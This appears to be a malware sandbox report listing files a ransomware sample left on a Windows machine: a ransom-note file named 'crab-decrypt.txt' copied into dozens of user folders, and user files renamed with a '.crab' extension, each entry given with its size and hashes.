c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\jscache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\assetcache\eygueqkq\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\nativecache\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logs\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\sonar1.0\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\#sharedobjects\p7ub2489\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\16\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\inputmethod\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\inputmethod\chs\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\protect\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\publisher building blocks\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\speech\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\spelling\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\spelling\en-us\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\systemcertificates\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\systemcertificates\my\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\systemcertificates\my\certificates\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\systemcertificates\my\crls\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\systemcertificates\my\ctls\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\theme colors\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\theme effects\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\theme fonts\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 		False
...
c:\$recycle.bin\s-1-5-21-2172869166-1497266965-2109836178-1000\$ipewi8i.tmp.crab 0.67 KB MD5: 9126296e0dcaf851df5209121867f433
SHA1: e8cabfbab7c89afc8f8c5a2cab6316eb338db5fa
SHA256: bde73da1e1a47653bc41c876383655184b8c176fe4f3d991a4e0a22de751e026 		False
...
c:\users\nd9e1fyi\appdata\roaming\27yji_tg_wmdvk-.gif.crab 3.00 KB MD5: 33b37811e300cd38fd42ee4595e64a7a
SHA1: 13a299124374d056be60ad69363b0d61a61bba94
SHA256: 0943f228aaba2fdb420dae8af3705520ae645c4f5c9128d7202a1ecbce49e50f 		False
...
c:\users\nd9e1fyi\appdata\roaming\2kxnzgrrl.doc.crab 75.27 KB MD5: 0925ae510c00843e8ff004dcd205ad55
SHA1: 13d2e372537974ae87bf0beacf52fabb8bf16bfe
SHA256: 5d6434586875c05706540c9cd8f9f507ae0cfeeb9debf5ef47ef1cf69a9f56cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\57vfxi.wav.crab 27.66 KB MD5: 57d39e8e934f486ce2df553b8b37cefb
SHA1: 6f88945811525cd707f139d8acaf24b0c4bb7c32
